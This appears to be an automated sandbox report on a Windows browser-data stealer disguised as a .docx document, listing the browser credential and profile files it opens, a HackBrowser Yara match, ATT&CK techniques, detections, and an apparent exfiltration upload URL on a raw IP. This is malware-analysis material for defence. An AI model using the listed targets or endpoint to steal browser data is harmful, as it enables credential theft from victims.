Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior

Remote Access Functionality

Yara detected HackBrowser

Source: Yara match	File source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.2083812372.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe PID: 5952, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Data from Local System	11 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 DLL Side-Loading	LSASS Memory	11 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	54%	ReversingLabs	Win64.Trojan.Znyonm
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	51%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdsync:	0%	Virustotal		Browse
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureC:	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://drive-autopush.corp.google.com/	0%	Virustotal		Browse
https://drive-daily-2.corp.google.com/	0%	Virustotal		Browse
https://drive-daily-4.corp.google.com/	0%	Virustotal		Browse
https://drive-daily-1.corp.google.com/	0%	Virustotal		Browse
https://chrome.google.com/webstore	0%	Virustotal		Browse
http://43.248.8.109:8888/uploadfmt:	0%	Virustotal		Browse
https://drive-daily-5.corp.google.com/	0%	Virustotal		Browse
https://drive-staging.corp.google.com/	0%	Virustotal		Browse
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee	0%	Virustotal		Browse
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md	0%	Virustotal		Browse
https://docs.google.com/	0%	Virustotal		Browse
https://drive.google.com/	0%	Virustotal		Browse
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature	0%	Virustotal		Browse
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04	0%	Virustotal		Browse
https://drive-daily-0.corp.google.com/	0%	Virustotal		Browse
https://drive-preprod.corp.google.com/	0%	Virustotal		Browse
http://43.248.8.109:8888/upload	0%	Virustotal		Browse
https://drive-daily-6.corp.google.com/	0%	Virustotal		Browse
https://www.google.com/	0%	Virustotal		Browse
https://github.com/moonD4rk/HackBrowserDataCompactions	0%	Virustotal		Browse
https://drive-daily-3.corp.google.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://43.248.8.109:8888/upload	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://file://mailto:http://BINARY-x0X03.46.0	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	false		unknown
https://duckduckgo.com/chrome_newtab	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdsync:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureC:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://chrome.google.com/webstore	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://drive-daily-2.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://drive-autopush.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://drive-daily-4.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
http://43.248.8.109:8888/uploadfmt:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-1.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
https://chrome.google.com/webstore/detail/PrintableString	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	places.sqlite_17.temp.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-5.corp.google.com/	Secure Preferences_9.temp.0.dr	false	0%, Virustotal, Browse	unknown
